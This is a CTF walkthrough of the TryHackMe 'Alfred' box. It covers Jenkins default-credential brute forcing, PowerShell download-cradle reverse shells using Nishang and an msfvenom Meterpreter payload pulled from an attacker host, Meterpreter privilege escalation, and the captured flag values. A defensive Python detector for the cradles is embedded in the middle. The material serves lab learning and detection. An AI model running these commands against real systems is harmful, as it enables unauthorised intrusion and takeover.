TryHackMe Alfred – How I Solved The Challenge : Benjamin Reitz
by: Benjamin Reitz
Blog post content copied from Finxter.
In this Capture the Flag (CTF) challenge walkthrough, I’ll hack into a Jenkins service running on Windows, find a way to carry out Remote Command Execution (RCE), use Metasploit to gain access to the box, and escalate my privileges to NT AUTHORITY\SYSTEM, which is the equivalent of root on a Windows machine.
Challenge: I need to capture two “flags”, the user.txt flag and the root.txt flag. Let’s get started!
First, we’ll note down our IP addresses, export them, and run our nmap scan with the flag -Pn to skip host discovery.
INITIAL ENUMERATION
IPs:
export myIP=10.6.2.23
export targetIP=10.10.99.176

┌──(tester㉿box)-[~/THM]
└─$ nmap 10.10.216.90 -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 22:39 EST
Nmap scan report for 10.10.216.90
Host is up (0.083s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
3389/tcp open  ms-wbt-server
8080/tcp open  http-proxy
Nmap done: 1 IP address (1 host up) scanned in 7.05 seconds
We see that there are three open ports.
There is an HTTP service running on port 80. That is presumably a website, which we will look at in a moment in our browser.
The ms-wbt-server running on port 3389 looks interesting. A quick Google search reveals that it is the RDP (Remote Desktop Protocol) service.
Also, the http-proxy on 8080 looks intriguing. On port 80 we find a picture of Batman in plain clothes. There’s not much to see here. A quick look at the HTML source doesn’t reveal anything else of interest.
HACKING JENKINS WITH BURPSUITE
On port 8080, we find a login page to Jenkins.
Let’s take a few guesses with some of the standard factory-set credentials: admin:password, admin:admin, etc.
Using the proxy intercept and sending it to the intruder function, we can set up a list of passwords and usernames to try as a sniper-style attack.
Based on the different lengths of the responses, we can see that admin:admin may be our winning combination. We are in luck that this company has lazy administrators who don’t properly safeguard their business! The system lets us in as expected with admin:admin.
At TryHackMe’s suggestion, we’ll use Nishang to spawn a reverse shell from Windows. Inside the Jenkins admin dashboard, we can click on project 1 and then open its Configure page.
In the last text box, we can perform remote command execution.
USING REMOTE COMMAND EXECUTION TO SPAWN A REVSHELL PAYLOAD
First, let’s spawn a reverse shell using Invoke-PowerShellTcp.ps1 from Nishang’s Git repo. After downloading the file from the repo, we launch a Netcat listener with the command:
nc -lnvp 8888
Then we use the following command in the last text box on Jenkins project 1 settings.
powershell iex (New-Object Net.WebClient).DownloadString('http://10.6.2.23:8000/Invoke-PowerShellTcp.ps1')
After clicking on “Build” in the Jenkins dashboard, we catch the shell on our Netcat listener and discover the user.txt flag!

user.txt: 79007a09481963edf2e1321abd9ae2a0
USING MSFVENOM TO CREATE A MALICIOUS PAYLOAD
We can create a custom malicious payload to enable us to connect to a more powerful reverse shell within Metasploit using the following command in our attack box:
sudo msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.2.23 LPORT=4444 -f exe -o shell.exe
Now we need to start up Metasploit console:
msfconsole
Load the Meterpreter handler exploit/multi/handler:
use exploit/multi/handler
Set up our payload:
set payload windows/meterpreter/reverse_tcp
And finally, type: run
Next, we spin up a simple HTTP server to serve shell.exe to the Windows box with:
python -m http.server 8000
Then we can copy and run the file on the target machine by again using remote command execution via the Jenkins edit build function:
powershell "(New-Object System.Net.WebClient).DownloadFile('http://10.6.2.23:8000/shell.exe','shell.exe')"
Metasploit then launches a new Meterpreter session on the target box. If the shell.exe file is grabbed successfully from the HTTP server (code 200) but no Meterpreter session is spawned, we can use one more Jenkins RCE to run the payload:
./shell.exe
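From the defender’s side, both build-step commands above (the Nishang download cradle and the shell.exe fetch) leave the same footprint: PowerShell spawned by the Jenkins process with a WebClient download in its command line. The following is an added example, not part of the original post, that flags that pattern over constructed Sysmon-style process-creation records; the field names, the parent-process set and the sample events are assumptions.

```python
import re
from typing import Iterable

# Parents a Jenkins build step launches PowerShell from on Windows: java.exe
# (the Jenkins service) or cmd.exe wrapping a batch step. Assumed set.
JENKINS_PARENTS = {"java.exe", "cmd.exe"}

# Download-cradle primitives from the post's two build-step commands,
# matched case-insensitively (PowerShell accepted "Downloadfile" above).
CRADLE_PATTERNS = {
    "webclient": re.compile(r"New-Object\s+(System\.)?Net\.WebClient", re.I),
    "download": re.compile(r"\.Download(String|File)\s*\(", re.I),
    "iex": re.compile(r"(^|[\s;(\"'])(iex|Invoke-Expression)\b", re.I),
}

def score_event(event: dict) -> list[str]:
    """Reasons a process-creation event looks like a build-step cradle."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    parent = event["parent_image"].lower().rsplit("\\", 1)[-1]
    reasons: list[str] = []
    if image not in ("powershell.exe", "pwsh.exe"):
        return reasons  # only PowerShell launches are in scope
    if parent in JENKINS_PARENTS:
        reasons.append(f"powershell spawned by {parent}")
    for name, pattern in CRADLE_PATTERNS.items():
        if pattern.search(event["command_line"]):
            reasons.append(f"cradle:{name}")
    return reasons

def find_cradles(events: Iterable[dict]) -> list[tuple[int, list[str]]]:
    """Events with at least one cradle primitive, plus every matched reason."""
    scored = ((e["id"], score_event(e)) for e in events)
    return [(i, r) for i, r in scored if any(x.startswith("cradle:") for x in r)]

# Constructed Sysmon-style records (not real telemetry; field names assumed).
# Events 2 and 3 mirror the two commands run through the Jenkins build step.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": "powershell Get-Service"},
    {"id": 2, "parent_image": r"C:\Program Files\Java\bin\java.exe", "image": PS,
     "command_line": "powershell iex (New-Object Net.WebClient).DownloadString"
                     "('http://10.6.2.23:8000/Invoke-PowerShellTcp.ps1')"},
    {"id": 3, "parent_image": r"C:\Program Files\Java\bin\java.exe", "image": PS,
     "command_line": "powershell \"(New-Object System.Net.WebClient).Downloadfile"
                     "('http://10.6.2.23:8000/shell.exe','shell.exe')\""},
    {"id": 4, "parent_image": r"C:\Program Files\Java\bin\java.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd /c whoami"},
]
```

Running find_cradles(SAMPLE_EVENTS) returns events 2 and 3 with the parent and cradle reasons; the benign PowerShell launch and the non-PowerShell child of java.exe are not reported.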
PRIVILEGE ESCALATION TO ROOT
First, we issue the following command in our Meterpreter session to automatically escalate to the highest privilege possible:
getsystem
We now operate with NT AUTHORITY\SYSTEM privileges for most things, but not for every single command. To fix this, we can migrate into another process on the target machine.
Entering the command “ps” gives us a list of processes. We’ll use the process system.exe with the following command:
migrate <PID>
(the process ID of the target process running as NT AUTHORITY\SYSTEM, in this case system.exe)
Now Meterpreter is running in the target machine’s memory inside the system.exe process. We have full NT AUTHORITY\SYSTEM privileges and can easily find root.txt with the following commands:
search -f root.txt
cat root.txt
root.txt: dff0f748678f280250f25a45b8046b4a
Thanks for reading/watching my walkthrough.
December 25, 2022 at 04:05PM